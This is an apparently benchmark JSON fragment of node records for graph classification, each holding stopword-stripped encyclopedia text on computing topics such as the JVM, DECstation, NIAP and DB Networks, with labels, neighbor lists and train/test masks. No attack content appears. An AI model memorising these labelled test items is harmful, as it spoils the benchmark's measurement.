10.4 sdks open transport support removed entirely os x starting version 10.9 mavericks",
    "neighbors": [
      576,
      5601,
      6377,
      4333,
      942,
      2995,
      5492,
      5397,
      823,
      5976,
      4345,
      3167
    ],
    "mask": "Test"
  },
  {
    "node_id": 5865,
    "label": 4,
    "text": "National_Information_Assurance_Partnership:national information assurance partnership national information assurance partnership niap united states government initiative meet security testing needs information technology consumers producers operated national security agency nsa originally joint effort nsa national institute standards technology nist long-term goal niap help increase level trust consumers information systems networks use cost-effective security testing evaluation validation programs meeting goal niap seeks principal objective niap validation body ensure provision competent security evaluation validation services government industry validation body ultimate responsibility operation ccevs accordance policies procedures appropriate interpret amend policies procedures nsa responsible providing sufficient resources validation body may carry responsibilities validation body led director deputy director selected nsa management director validation body reports niap director administrative budgetary matters nsa certificate-issuing authorities ccevs related operational matters general director deputy director serve two-year term service term service may extended discretion nsa management also significant number technical administrative support personnel required provide full range validation services sponsors evaluations common criteria testing laboratories cctl personnel include validators technical experts various technology cells senior members technical staff security community oversight board validation body ensures appropriate mechanisms place protect interests parties within ccevs participating process security evaluation dispute brought forth participating party i.e. sponsor evaluation product protection profile developer cctl concerning operation ccevs associated activities shall referred validation body resolution disputes involving validation body nsa management attempt resolve dispute procedures agreed upon two organizations",
    "neighbors": [
      6593,
      8904,
      2761,
      7887,
      4253,
      4798
    ],
    "mask": "Test"
  },
  {
    "node_id": 5866,
    "label": 4,
    "text": "DB_Networks:db networks db networks privately held information security company founded united states company provides enterprise database security equipment software service company ’ headquarters san diego california regional offices located palo alto california seattle washington db networks founded united states 2009 provide database security including database infrastructure assessment compromised credential identification sql injection defense predominantly financial services industry federal government company initially financed angel investors 2012 company raised 4.5m venture capital khosla ventures 2014 company closed 17 million round funding led khosla ventures grotech ventures company first product adf-4200 launched february 2013 also february 2013 company announced partnership alamo city engineering services aces offer products us military civilian federal agencies october 2013 company announced ids-6300 later renamed dbn-6300 originally sql injection defense database infrastructure security product 2013 db networks invited join cync cybersecurity technology program direction northrop grumman university maryland baltimore county research park corporation cync program identifies innovative technologies combat cybersecurity threats 2014 amp tech solutions announced channel partner offer db network products nasa solutions enterprise-wide procurement sewp iv contract united states federal agencies 2015 db networks awarded two united states patents database security technologies db networks began licensing database security software technologies original equipment manufacturers oems february 2016 coinciding launch layer 7 database sensor partnerships announced fireeye cyphort security on-demand db networks database security technology based machine learning behavioral analysis opposed traditional information security approach requiring human generated blacklists whitelists machine learning behavioral analysis platform learns applications proper sql transaction behavior compromised credentials rogue sql statements sql injection attack deviate established model raise alarm database attack machine learning behavioral analysis technologies ability prevent advanced zero-day database attacks without prior threat intelligence need establish maintain signature files known attack strings db networks dbn-6300 announced october 2013 originally referred ids-6300 dbn-6300 2u purpose-built database security appliance uses machine learning behavioral analysis identify database attacks real-time virtual appliance version dbn-6300 launched february 2014 referred dbn-6300v layer 7 database sensor launched february 2016 layer 7 database sensor enables information security product manufactures integrate db networks database security technology products march 2016 insider threat protection capabilities added dbn-6300 layer 7 database sensor products 2016 2015 2014 2013",
    "neighbors": [
      1314,
      899,
      9286,
      3944,
      10413,
      9688,
      5563,
      5373,
      5407
    ],
    "mask": "None"
  },
  {
    "node_id": 5867,
    "label": 5,
    "text": "X_video_extension:x video extension x video extension often abbreviated xvideo xv video output mechanism x window system protocol designed david carver specification version 2 protocol written july 1991 mainly used today resize video content video controller hardware order enlarge given video watch full screen mode without xvideo x would scaling main cpu requires considerable amount processing power could slow degrade video stream video controllers specifically designed kind computation much cheaply similarly x video extension video controller perform color space conversions change contrast brightness hue displayed video stream order work three things come together modern video controllers provide functions required xvideo feature known hardware scaling yuv acceleration sometimes 2d hardware acceleration xfree86 x display server implemented xvideo since version 4.0.2 check whether given x display server supports xvideo one use utility xdpyinfo check whether video controller provides required functions whether x device driver implements xvideo one use xvinfo program video playback programs run x window system mplayer mythtv xine typically option enable xvideo output advisable switch option system gpu video-hardware device drivers supports xvideo modern rendering systems opengl vdpau unavailable – speedup noticeable even fast cpu protocol features reading writing video streams video adapters practice today functions xvputimage xvshmputimage used client program repeatedly prepares images passes graphics hardware scaled converted displayed video scaled prepared display video card must displayed possible ways display accelerated video stage since full acceleration means video controller responsible scaling converting drawing video technique used depends entirely video drawn onto x video finally drawn depends largely x window manager use properly installed drivers gpu hardware supported intel ati nvidia chip sets window managers called compositing window managers allow windows separately processed rendered composited involves windows rendered separate output buffers memory first later combined form complete graphical interface video memory individual windows transformed separately accelerated video may added stage using texture filter window composited drawn xvideo also used accelerate video playback drawing windows using opengl framebuffer object pbuffer metacity x window manager uses compositing way compositing also make use 3d pipelines accelerations glx_ext_texture_from_pixmap among things process allows many video outputs share screen without interfering compositing window managers compiz also use compositing however system limited opengl acceleration function specifically lack opengl framebuffer object pbuffer use opengl environment like xgl makes xv hardware accelerations impossible event window manager n't directly support compositing difficult isolate video stream rendered time accelerated output already turned single image way usually employ post processed hardware overlay using chroma keying windows already drawn pieces information available size position video window canvas third piece information required indicate parts video window canvas obscured windows therefore video player draws canvas using solid color 'll say green color becomes makeshift third dimension windows drawn windows covering video player block green color video stream added output graphics card simply scan co-ordinates canvas encounters green knows found visible portion video window draws portions video process also available option render hardware accelerated video microsoft windows xp earlier since window management features deeply embedded operating system accelerating would impossible window manager n't support compositing post processed hardware overlays using chroma keying described previous paragraph make impossible produce proper screenshots xvideo applications also make impossible view kind playback secondary display one overlay allowed hardware level",
    "neighbors": [
      10658,
      9223,
      8682,
      1644,
      429,
      7309,
      1776,
      3764,
      2581,
      8438,
      11485,
      9567
    ],
    "mask": "Test"
  },
  {
    "node_id": 5868,
    "label": 4,
    "text": "Proof_of_Age_Standards_Scheme:proof age standards scheme pass proof age standards scheme government-backed scheme uk gives young people valid accepted form proof age identification scheme supported home office chartered trading standards institute ctsi national police chiefs ’ council npcc acts umbrella system issue identification cards various proof age card schemes operate pass umbrella issue cards bear pass hologram proof authenticity validity set 2001 develop recognisable way endorsing proof age card schemes due united kingdom issuing government identification card individuals ‘ drive difficulty providing proof age purchasing age-restricted products cigarettes alcohol june 2014 18+ card designs standardised apart young scot card scotland real variation appearance logo issuing organisation corner citing feedback police retailers effort increase acceptance venues especially night-time economy november 2016 pass reorganised become community interest company ownership british retail consortium ended january 2018 national police chiefs ’ council npcc logo replaced association chief police officers acpo logo lower left corner standardised 18+ card design two types card suppliers national regional regional cards often requirements residency area issued national cards obtained anyone provide required information currently three councils offer regional cards bracknell forest council e+ card milton keynes council 1 card london borough southwark pal national suppliers citizencard id card oneid4u validateuk young scot card available eligible individuals resident scotland proof age standards scheme goal become preferred standard proving age britons 5 million cards issued since 2001 200,000 2017 2018 several trade bodies currently support pass association convenience stores british beer pub association british institute innkeeping uk hospitality wine spirits trade association addition home office chartered trading standards institute national police chiefs council security industry authority also support organisation responsibility sellers supply alcohol tobacco age restricted products people legal age checking proof age card protects inadvertently selling under-age people look older places requiring proof age accept cards despite pass hologram retailers licensees right refuse sell product deny entry individual even possess pass endorsed card 2011 500,000 holders pass endorsed card refused entry pubs clubs result 2014 police security industry authority licences doorstaff agreed permit logos displayed pass cards displaying standardised design 2017 passport office urged passport-holders leave passports home use pass card nights 2019 pass agreed develop standards presentation digital proof age purpose enabling home office amend mandatory licensing conditions approved forms digital physical proof age could accepted licensees purpose demonstrating due diligence",
    "neighbors": [
      8270,
      9199
    ],
    "mask": "None"
  },
  {
    "node_id": 5869,
    "label": 9,
    "text": "Prince_(software):prince software prince formerly prince xml proprietary software program converts xml html documents pdf files applying cascading style sheets css technology electronic publishing dynamic data-driven pdf generation enables replacing xsl-fo frameworks css3 ones developed yeslogic small company based melbourne australia marketed professional xml+css3 pdf solution received positive reviews considered unique product 2000s april 2003 prince 1.0 released basic support xhtml cascading style sheets css scalable vector graphics svg arbitrary xml first version command-line program supported microsoft windows linux graphical user interface windows yet subsequent releases css support steadily extended comparable web browsers opera mozilla firefox also expanded support additional platforms—the latest offering include packages apple mac freebsd solaris platforms december 2005 prince 5.1 passed acid2 test web standards project third user agent pass test safari konqueror prince developed using mercury functional logic programming language main driving force behind prince standard css3-paged integrates paged media including pdf layout specification w3c technologies html4 html5 xhtml free xml working javascript sources",
    "neighbors": [
      3462,
      8584,
      1083,
      4855,
      6539,
      6797,
      7983,
      5907,
      3828,
      8627,
      823,
      2139,
      8413,
      8923,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 5870,
    "label": 4,
    "text": "ITHC:ithc ithc health check security assessment required part accreditation process many government computer systems uk ithc generally performed external service provider although ncsc personnel may perform ithcs especially sensitive systems touch applications infrastructure involves element penetration testing check scheme ithc providers run ncsc",
    "neighbors": [
      11172,
      4595,
      7228
    ],
    "mask": "None"
  },
  {
    "node_id": 5871,
    "label": 3,
    "text": "List_of_Intel_CPU_microarchitectures:list intel cpu microarchitectures following partial list intel cpu microarchitectures list incomplete additional details found intel tick-tock model process-architecture-optimization model",
    "neighbors": [
      3459,
      5380,
      3973,
      8325,
      9095,
      5386,
      9611,
      4108,
      9741,
      398,
      6926,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      1820,
      9500,
      6815,
      2088,
      10669,
      9391,
      10675,
      4276,
      1461,
      8501,
      10548,
      2237,
      5309,
      6339,
      5444,
      9541,
      1998,
      2638,
      5073,
      7134,
      1119,
      1247,
      3175,
      1000,
      7657,
      9707,
      4204,
      5356,
      8684,
      5871,
      499,
      8820,
      3317,
      4217,
      5883,
      3070,
      5503
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5872,
    "label": 9,
    "text": "Java_virtual_machine:java virtual machine java virtual machine jvm virtual machine enables computer run java programs well programs written languages also compiled java bytecode jvm detailed specification formally describes required jvm implementation specification ensures interoperability java programs across different implementations program authors using java development kit jdk need worry idiosyncrasies underlying hardware platform jvm reference implementation developed openjdk project open source code includes jit compiler called hotspot commercially supported java releases available oracle corporation based openjdk runtime eclipse openj9 another open source jvm openjdk java virtual machine abstract virtual computer defined specification garbage-collection algorithm used internal optimization java virtual machine instructions translation machine code specified main reason omission unnecessarily constrain implementers java application run inside concrete implementation abstract specification java virtual machine starting java platform standard edition j2se 5.0 changes jvm specification developed java community process jsr 924. changes specification support changes proposed class file format jsr 202 done maintenance release jsr 924 specification jvm published blue book preface states one oracle jvms named hotspot inherited bea systems jrockit clean-room java implementations include kaffe openj9 skelmir cee-j oracle owns java trademark may allow use certify implementation suites fully compatible oracle specification one organizational units jvm byte code class class loader implementation must able recognize load anything conforms java class file format implementation free recognize binary forms besides class files must recognize class files class loader performs three basic activities strict order general two types class loader bootstrap class loader user defined class loader every java virtual machine implementation must bootstrap class loader capable loading trusted classes java virtual machine specification n't specify class loader locate classes jvm operates primitive values integers floating-point numbers references jvm fundamentally 32-bit machine codice_1 codice_2 types 64-bits supported natively consume two units storage frame local variables operand stack since unit 32 bits codice_3 codice_4 codice_5 codice_6 types sign-extended except codice_6 zero-extended operated 32-bit integers codice_8 types smaller types type-specific instructions loading storing type conversion codice_3 operated 8-bit codice_4 values 0 representing codice_11 1 representing codice_12 although codice_3 treated type since java virtual machine specification second edition clarified issue compiled executed code little difference codice_3 codice_4 except name mangling method signatures type boolean arrays codice_3s method signatures mangled codice_17 codice_4s mangled codice_19 boolean arrays carry type codice_20 use 8 bits per element jvm built-in capability pack booleans bit array except type perform behave codice_4 arrays uses codice_3 type effectively unknown jvm instructions operate booleans also used operate codice_4s jvm garbage-collected heap storing objects arrays code constants class data stored method area method area logically part heap implementations may treat method area separately heap example might garbage collect jvm thread also call stack called java virtual machine stack clarity stores frames new frame created time method called frame destroyed method exits frame provides operand stack array local variables operand stack used operands computations receiving return value called method local variables serve purpose registers also used pass method arguments thus jvm stack machine register machine jvm instructions following groups tasks aim binary compatibility particular host operating system needs implementation jvm runtime jvms interpret bytecode semantically way actual implementation may different complex emulating bytecode compatibly efficiently implementing java core api must mapped host operating system instructions operate set common rather native data types specific instruction set architecture jvm language language functionality expressed terms valid class file hosted java virtual machine class file contains java virtual machine instructions java byte code symbol table well ancillary information class file format hardware- operating system-independent binary format used represent compiled classes interfaces several jvm languages old languages ported jvm completely new languages jruby jython perhaps well-known ports existing languages i.e ruby python respectively new languages created scratch compile java bytecode clojure apache groovy scala kotlin may popular ones notable feature jvm languages compatible example scala libraries used java programs vice versa java 7 jvm implements jsr 292 supporting dynamically typed languages java platform new feature supports dynamically typed languages jvm feature developed within da vinci machine project whose mission extend jvm supports languages java basic philosophy java inherently safe standpoint user program crash host machine otherwise interfere inappropriately operations host machine possible protect certain methods data structures belonging trusted code access corruption untrusted code executing within jvm furthermore common programmer errors often led data corruption unpredictable behavior accessing end array using uninitialized pointer allowed occur several features java combine provide safety including class model garbage-collected heap verifier jvm verifies bytecode executed verification consists primarily three types checks first two checks take place primarily verification step occurs class loaded made eligible use third primarily performed dynamically data items methods class first accessed another class verifier permits bytecode sequences valid programs e.g jump branch instruction target instruction within method furthermore verifier ensures given instruction operates fixed stack location allowing jit compiler transform stack accesses fixed register accesses jvm stack architecture imply speed penalty emulation register-based architectures using jit compiler face code-verified jvm architecture makes difference jit compiler whether gets named imaginary registers imaginary stack positions must allocated target architecture registers fact code verification makes jvm different classic stack architecture efficient emulation jit compiler complicated typically carried slower interpreter original specification bytecode verifier used natural language incomplete incorrect respects number attempts made specify jvm formal system security current jvm implementations thoroughly analyzed potential security exploits prevented also possible optimize jvm skipping unnecessary safety checks application run proven safe virtual machine architecture allows fine-grained control actions code within machine permitted take assumes code semantically correct successfully passed formal bytecode verifier process materialized tool possibly off-board virtual machine designed allow safe execution untrusted code remote sources model used java applets secure code downloads bytecode-verified downloaded code runs restricted sandbox designed protect user misbehaving malicious code addition bytecode verification process publishers purchase certificate digitally sign applets safe giving permission ask user break sandbox access local file system clipboard execute external pieces software network formal proof bytecode verifiers done javacard industry formal development embedded verifier java card byte code hardware architecture different java bytecode interpreter needed computer java bytecode interpreter run java bytecode program program run computer interpreter java bytecode executed interpreter execution always slower execution program compiled native machine language problem mitigated just-in-time jit compilers executing java bytecode jit compiler may translate java bytecode native machine language executing program translated parts program executed much quickly could interpreted technique gets applied parts program frequently executed way jit compiler significantly speed overall execution time necessary connection java programming language java bytecode program written java compiled directly machine language real computer programs written languages java compiled java bytecode java bytecode intended platform-independent secure jvm implementations include interpreter consist just-in-time compiler start java platform lifetime jvm marketed web technology creating rich internet applications web browsers operating systems bundling web browsers ship java plug-in permit side-loading non-flash plug-in java browser plugin deprecated jdk 9 npapi java browser plug-in designed allow jvm execute so-called java applets embedded html pages browsers plug-in installed applet allowed draw rectangular region page assigned plug-in includes jvm java applets restricted java programming language language targeting jvm may run plug-in restricted set apis allow applets access user microphone 3d acceleration although applets able modify page outside rectangular region adobe flash player main competing technology works way respect may 2016 javapoly allows users import unmodified java libraries invoke directly javascript javapoly allows websites use unmodified java libraries even user java installed computer continuing improvements javascript execution speed combined increased use mobile devices whose web browsers implement support plugins efforts target users compilation javascript possible either compile source code jvm bytecode javascript compiling jvm bytecode universal across jvm languages allows building upon language existing compiler bytecode main jvm bytecode javascript compilers teavm compiler contained dragome web sdk bck2brwsr j2js-compiler leading compilers jvm languages javascript include java-to-javascript compiler contained google web toolkit clojurescript clojure grooscript apache groovy scala.js scala others java runtime environment jre released oracle freely available software distribution containing stand-alone jvm hotspot java standard library java class library configuration tool and—until discontinuation jdk 9—a browser plug-in common java environment installed personal computers laptop desktop form factor mobile phones including feature phones early smartphones ship jvm likely include jvm meant run applications targeting micro edition java platform meanwhile modern smartphones tablet computers handheld pcs run java apps likely support android operating system includes open source virtual machine incompatible jvm specification instead google android development tools take java programs input output dalvik bytecode native input format virtual machine android devices jvm specification gives lot leeway implementors regarding implementation details since java 1.3 jre oracle contains jvm called hotspot designed high-performance jvm speed-up code execution hotspot relies just-in-time compilation speed-up object allocation garbage collection hotspot uses generational heap java virtual machine heap area memory used jvm dynamic memory allocation hotspot heap divided generations permanent generation permgen used class definitions associated metadata prior java 8 permanent generation part heap permanent generation removed java 8 originally permanent generation objects classes stored together area class unloading occurs much rarely objects collected moving class structures specific area allowed significant performance improvements oracle jre installed large number computers end users out-of-date version jre therefore vulnerable many known attacks led widely shared belief java inherently insecure since java 1.7 oracle jre windows includes automatic update functionality discontinuation java browser plug-in web page might potentially run java applet provided easily accessible attack surface malicious web sites 2013 kaspersky labs reported java plug-in method choice computer criminals java exploits included many exploit packs hackers deploy onto hacked web sites java applet removed java 11 launched september 25th 2018",
    "neighbors": [
      9731,
      7176,
      4112,
      6161,
      10776,
      3613,
      9245,
      5663,
      5154,
      10789,
      10796,
      5677,
      10808,
      1083,
      572,
      2619,
      7750,
      9291,
      597,
      7777,
      2658,
      11363,
      9831,
      1130,
      4205,
      9330,
      9333,
      5751,
      8312,
      3705,
      8825,
      9343,
      3712,
      4235,
      9356,
      2710,
      7326,
      1707,
      3247,
      2225,
      6322,
      9911,
      2234,
      1724,
      5314,
      6338,
      10436,
      6860,
      7372,
      9432,
      11488,
      1250,
      2786,
      9955,
      5354,
      5358,
      242,
      1780,
      2808,
      7421,
      5375,
      2304,
      3328,
      4358,
      1801,
      1809,
      1301,
      3869,
      10013,
      10526,
      11552,
      1316,
      3876,
      3877,
      6950,
      7462,
      10537,
      11559,
      814,
      7983,
      9011,
      7485,
      6477,
      2895,
      3920,
      1363,
      3413,
      11093,
      10584,
      9050,
      349,
      1376,
      4960,
      5987,
      8037,
      6502,
      8554,
      11626,
      4972,
      7022,
      1393,
      2417,
      7026,
      9078,
      1399,
      3966,
      8582,
      910,
      8082,
      8598,
      11670,
      409,
      11674,
      8094,
      1952,
      8609,
      10145,
      5031,
      937,
      4011,
      5040,
      9138,
      6067,
      9144,
      9657,
      6074,
      10683,
      10684,
      3519,
      5567,
      7104,
      9665,
      10693,
      1480,
      8140,
      10703,
      10193,
      2517,
      10200,
      4572,
      3560,
      3561,
      3562,
      7146,
      5612,
      7148,
      8680,
      9714,
      8179,
      7671,
      3577,
      6142,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 5873,
    "label": 3,
    "text": "DECstation:decstation decstation brand computers used dec refers three distinct lines computer systems—the first released 1978 word processing system latter widely known two released 1989 comprised range computer workstations based mips architecture range pc compatibles mips-based workstations ran ultrix dec-proprietary version unix early releases osf/1 first line computer systems given decstation name word processing systems based pdp-8 systems built vt52 terminal also known vt78 second completely unrelated line decstations began decstation 3100 released 11 january 1989 decstation 3100 first commercially available risc-based machine built dec line decstations fruit advanced development skunkworks project carried dec palo alto hamilton ave facility known pmax project focus produce computer systems family economics performance compete likes sun microsystems risc-based unix platforms day brainchild james billmaier mario pagliaro armando stettner joseph dinucci systems family also employ truly risc-based architecture compared heavier cisc vax still development prism architectures time dec mostly known cisc systems including successful pdp vax lines several architectures considered intel motorola others group quickly selected mips line microprocessors early mips microprocessors supported big- little-endian modes configured hardware reset little-endian mode chosen match byte ordering vax-based systems growing number intel-based pcs computers contrast vax later dec alpha architectures decstation 3100 family specifically designed built run unix system ultrix version vms operating system ever released decstations one issues debated project inception whether dec could sustain grow compete architecture invent manage core advocates later left company mips-based line computers shut favor alpha-based computers dec invented owned architecture descended prism development work first generation commercially marketed dec alpha systems dec 3000 axp series similar respects contemporaneous mips-based decstations sold alongside alpha systems decstation line gradually phased used turbochannel expansion bus video network cards well sold turbochannel option modules mice monitors keyboards later decstations planned based ecl-based r6000 canceled 14 august 1990 bipolar integrated technology failed deliver sufficient volumes microprocessor difficult fabricate yields r6000 reduced dec required little-endian mode used beginning continue available mips-based decstations used first target system development platform mach microkernel well early development windows nt operating system shortly prior release dec alpha systems port osf/1 decstation completed commercially released recently various free operating systems netbsd linux/mips ported mips-based decstations extending useful life providing modern operating system gxemul project emulates several decstation models original mips-based decstation 3100 followed cost reduced 2100 decstation 3100 claimed world fastest unix workstation time introduced three times fast vaxstation 3100 introduced time server configurations decstation models distributed without framebuffer graphics accelerator turbochannel q-bus based called decsystem confused pdp-10 machines name early models decstation heavily integrated systems little expansion capability even possess expansion buses decstation 5000 systems introduced later improved lack expansion capabilities providing turbochannel interconnect decstation 5000 systems also arc advanced risc computing compatible last decstation models focused increased component integration using custom asics reduce number discrete components begun decstation 5000 model 240 replaced discrete components lsi asics ended last model decstation 5000 model 260 used single vlsi asic much control logic packaged decstation 5000 systems sometimes suffixed two three letters letters refer graphics option system decstation 3100 2100 uses r2000 processor r2010 floating point coprocessor four r2020 write buffers r2000 uses external 64 kb direct-mapped instruction cache 64 kb direct-mapped write-through data cache cache line size four bytes four r2020 implement four-stage write buffer improve performance permitting r2000 write write-through data cache without stalling r2000 microprocessor could configured run either big-endian little-endian mode decstation family decision made run little-endian maintain compatibility vax family growing population intel-based pc decstation 3100 2100 memory system contains dram-based system memory vram-based framebuffers amount system memory supported 4 24 mb organized six physical memory banks systems 12 simm slots use 2 mb simms simm containing 1,048,576 word × 18-bit drams simms installed pairs increments 4 mb memory system byte-parity protected monochrome framebuffer implemented 256 kb vfb01 simm color framebuffer 1 mb vbf02 simm one framebuffer simms present framebuffer used simm slots rated 25 removal insertion cycles five recommended limit graphics capability provided two frame buffer modules monochrome color frame buffer monochrome frame buffer supports 1-bit color resolution 1024 × 864 pixels color frame buffer supports 8-bit color resolution monochrome frame buffer frame buffers use brooktree bt478 ramdac three 256-entry 8-bit color maps hardware cursor generated dc503 pcc programmable cursor chip provide 16 × 16 pixel 2-bit color cursor color frame buffer 8-bit write mask used select pixel updated none framebuffers use memory provided frame buffer module color frame buffer vram organized 2048 × 1024 pixels monochrome frame buffer 1024 × 1024 leftmost pixels displayed color frame buffer topmost pixels monochrome frame buffer unused areas vram may used store graphical structures fonts frame buffers parity-protected unlike rest system memory db15 male connector used video connector uses rs343a/rs170 compatible signals decstations onboard 10 mbit/s ethernet provided amd 7990 lance local area network controller ethernet amd 7992 sia serial interface adapter implements interface bnc thinwire ethernet connector 32 768 word × 16-bit 64 kb network buffer constructed srams provided improve performance 32 word 8-bit ethernet station address rom esar provides mac address mounted dip socket removable 5 mb/s single-ended scsi interface provided dc7061 sii gate array 64 k 16-bit 128 kb scsi buffer used improve performance decstations provide internal storage scsi interface connected external port honda68 male connector connected drive expansion boxes systems four asynchronous serial lines provided dc7085 gate array four serial lines third line required modem control signals support modem 4-pin mmj connector provided keyboard line 7-pin din connector mouse line two 6-pin mmj connectors printer modem lines real time clock motorola mc146818 also 50 bytes ram storing console configuration information 256 kb rom storing boot-strap self-test software provided two 128 kb roms dip sockets enclosure used decstation 3100 2100 identical enclosure used vaxstation 3100 systems use mechanically identical system module enclosure accommodate two 3.5-inch drives mounted trays system module system module located left enclosure power supply takes fourth space inside enclosure located left personal decstation 5000 series entry-level workstations code named maxine personal decstation uses low-profile desktop case contained power supply left two mounts two fixed drives one fixed drive one diskette drive front system logic contained two printed circuit boards base system module contained majority logic cpu module contained processor three models cpu module contains cpu subsystem first model contains chipset consisting 20 25 33 mhz r3000a cpu r3010 fpu accompanied 64 kb instruction cache 64 kb data cache caches direct-mapped 4-byte cache line data cache write components cpu module operate clock frequency r300a cpuctl asic also present purpose provide interfacing buffering faster cpu module slower 12.5 mhz system module cpuctl asic also implements 12.5 mhz turbochannel serves system interconnect second model revised version first module 20 25 mhz r3000a r3010 used plastic packaging whereas previous model used ceramic packaging third model contains r4000 microprocessor internal instruction data caches complemented 1 mb secondary cache systems 8 mb onboard memory four simm slots used expand amount memory 32 mb total 40 mb memory simm slots accept 2 8 mb simms pairs simms system must size memory bus 40 bits wide 32 bits used data four bits used byte-parity memory control asic controls memory communicates cpu subsystem via turbochannel bus expansion provided two turbochannel slots 64 mb physical address space personal decstation features integrated 8-bit color frame buffer capable resolution 1024 × 768 refresh rate 72 hz frame buffer consists 1 mb vram organized 262,144 32-bit words 32-bit word containing four 8-bit pixels frame buffer uses inmos ims g332 ramdac 256-entry 24-bit color look table selects 256 colors display palette 16,777,216 frame buffer treated part memory subsystem i/o subsystem provides system 8-bit single-ended scsi bus 10 mbit/s ethernet serial line serial desktop bus analog audio scsi provided ncr 53c94 asc advanced scsi controller ethernet provided amd am7990 lance local area network controller ethernet amd am7992 sia serial interface adapter implements aui interface single serial port capable 50 19,200 baud full modem control capability provided zilog z85c30 scc serial communications controller analog audio isdn support provided amd 79c30a dsc digital subscriber controller devices connected ioctl asic via two 8-bit buses one 16-bit bus asic interfaces subsystem turbochannel interconnect decstation 5000 model 100 series code named 3min mid-range workstations early models used chipset consisting r3000a cpu r3010 cpu 3- 5-inch daughter card plugs connector system module model 150 replaces r3000a r3010 single r4000 integrated fpu model 120 125 two external caches 64 kb instruction cache 64 kb data cache model 133 128 kb instruction cache systems support 16 128 mb memory 16 simm slots accept 2 8 mb simms one type simm may used 2 8 mb simms mixed system 2 mb simm identical simm used decstation 2100 3100 allowing upgrades older systems model 100 series reuse old memory three turbochannel option slots provided model 100 series introduces i/o controller asic later known ioctl asic interfaces two 8-bit i/o buses 12.5 mhz turbochannel decstation 200 series high-end workstations server configurations decstation 500 model 200 240 260 known decsystem 5000 model 200 240 260 respectively systems contain cpu module system module power supply located left side enclosure internal storage capability drives intended installed external single- multiple-drive enclosures enclosures connected system via scsi connector located rear system alternatively storage provided file server accessed network member model 200 series unique cpu subsystem model 200 cpu subsystem located kn02 system module contains chipset composed r3000 cpu r3010 fpu r3220 mb six-stage write/memory buffer also part subsystem processor external 64 kb instruction cache 64 kb write-through data cache contrast model 240 cpu subsystem located daughter card cpu module use processor chipset featuring single 40 mhz r3400 instead r3400 integrates r3000a cpu r3010 fpu single die package processor external 64 kb instruction cache 64 kb data cache connected r3400 40 mhz bus also serves datapath mb asic model 260 cpu subsystem also located cpu module daughter card features 120 mhz 60 mhz external r4000 internal instruction data caches external secondary cache model 260 cpu subsystem unique model 200 series contains boot rom firmware unlike members boot rom located system module difference due r4000 requiring different firmware could replaced upgrading model 240 model 260 model 200 series 15 simm slots located system module hold 8 480 mb memory proprietary 128-pin memory array modules simms capacities 8 mb 39 1 mbit dram chips 32 mb 39 4 mbit dram chips used simms installed system must size 8 mb simms used system may contain 8 120 mb memory 32 mb simms used system may contain 32 480 mb memory memory subsystem operates 25 mhz 32 bits wide match native word length r3000 memory subsystem protected ecc scheme seven bits check every 32-bit transaction simms two-way interleaved using low-order method even odd memory addresses treated separate banks memory interleaving memory subsystem doubles bandwidth non-interleaved memory subsystem using drams allowing model 200 series achieve effective maximum bandwidth 100 mb/s optional 1 mb nvram module provides disk cache improve performance installed one simm slots slot 14 simm slot closest front edge system module module uses battery prevent data lost case power failure module useful optional software installed model 200 uses discrete components implement memory subsystem logic model 240 discrete components replaced three asics mb asic mt asic ms asic mb memory buffer asic serves interface 40 mhz cpu module domain 25 mhz system module domain connected mt asic serves memory controller mt asic provides memory control refresh handles memory dma transactions ecc checking ms memory strobe asic provides 15 sets memory control lines routes memory control signals mt asic destination simm ms asic replaces 16 discrete components used model 200 also generates 25 mhz system clock signal replacing three discrete components used model 200 model 200 series uses turbochannel interconnect expansion models three turbochannel option slots model 200 provides 4 mb physical address space turbochannel option model 240 260 provides 8 mb turbochannel model 240 260 clocked 25 mhz model 240 260 mt asic implements turbochannel serves controller model 200 i/o subsystem significantly different model 240 260 i/o subsystem model 200 ethernet scsi capabilities provided two integrated turbochannel option modules pmad-aa ethernet pmaz-aa scsi pmad-aa uses amd 7990 lance local area network controller ethernet provides 10base-t ethernet interface implemented amd 7992 sia serial interface adapter bnc thinwire connector 8-bit single-ended scsi bus provided ncr 53c94 asc advanced scsi controller integrated option modules 128 kb sram serving buffer improve performance four serial lines also provided keyboard mouse communications port printer lines implemented two dc7085s dallas semiconductor ds1287 real time clock 50 bytes nvram also featured 256 kb system boot-strap diagnostic rom socket contrast model 240 260 i/o subsystem based around i/o controller asic serves bridge turbochannel two i/o buses implements i/o devices two zilog z85c30 sccs serial communications controller ncr 53c94 asc amd 7990 lance dallas semiconductor ds1287 real time clock system rom connected i/o buses i/o controller asic introduced model 240 first featured model 100 series asic used model 240 differs clocked twice high 25 mhz instead 12.5 mhz model 240 i/o subsystem would later used dec 3000 axp modified form decstation systems turbochannel slots could use turbochannel-based framebuffers 2d graphics accelerators 3d graphics accelerators options pxg variants capable either 8-bit 24-bit color resolution 1280 × 1024 refresh rate either 66 72 hz pxg also 8-bit 24-bit z-buffer double buffered color depth depth z-buffer extended installing additional vsimms z-buffer modules module pxg turbo variants capable 24-bit color resolution 1280 × 1024 refresh rate either 66 72 hz differ featuring 24-bit buffer storing off-screen pixmaps addition 24-bit z-buffer double buffer 3d graphics accelerators implemented digital proprietary pixelstamp architecture derived two research projects pixel planes university north carolina 8 8 display carnegie-mellon university pixelstamp architecture geometry pipeline consists dma engine geometry engine pixelstamp dma engine interfaces pipeline system via turbochannel receiving packets cpu sending geometry engine geometry engine consists amount sram intel i860 packets dma engine stored sram processed i860 writes results fifo pixelstamp consists stic stamp interface chip asic one two stamp asics stic fetches results fifo passes stamp asic performs scan conversion graphical functions data processed stamp asics final result consists rgb data written framebuffer built vsimms simm vrams located graphics accelerator option module displayed graphics accelerators grouped two distinct categories double-width options triple-width options pxg pxg+ double-width turbochannel option modules pxg turbo pxg turbo+ triple-width turbochannel option modules models suffixed higher performance models base model 44 mhz i860 instead 40 mhz i860 stic stamp asics operate clock frequencies 33 higher models suffixed turbo differ featuring 256 kb sram two stamp asics instead 128 kb sram one stamp asic models known lo 3d graphics accelerator lo 3d plus graphics accelerator upgraded mid 3d graphics accelerator mid 3d plus graphics accelerator installing vsimms z-buffer modules depending model decstation systems capable performing video conferencing high-quality audio output video input achieved use turbochannel option modules external peripherals video input achieved using decvideo also known pip picture-in-picture live-video-in option daughterboard plugs tx framebuffer provide ntsc pal secam input option used conjunction video camera microphone required software decstation used video conferencing audio capabilities provided decaudio turbochannel option module contained two amd 79c30a dsc digital subscriber controller devices 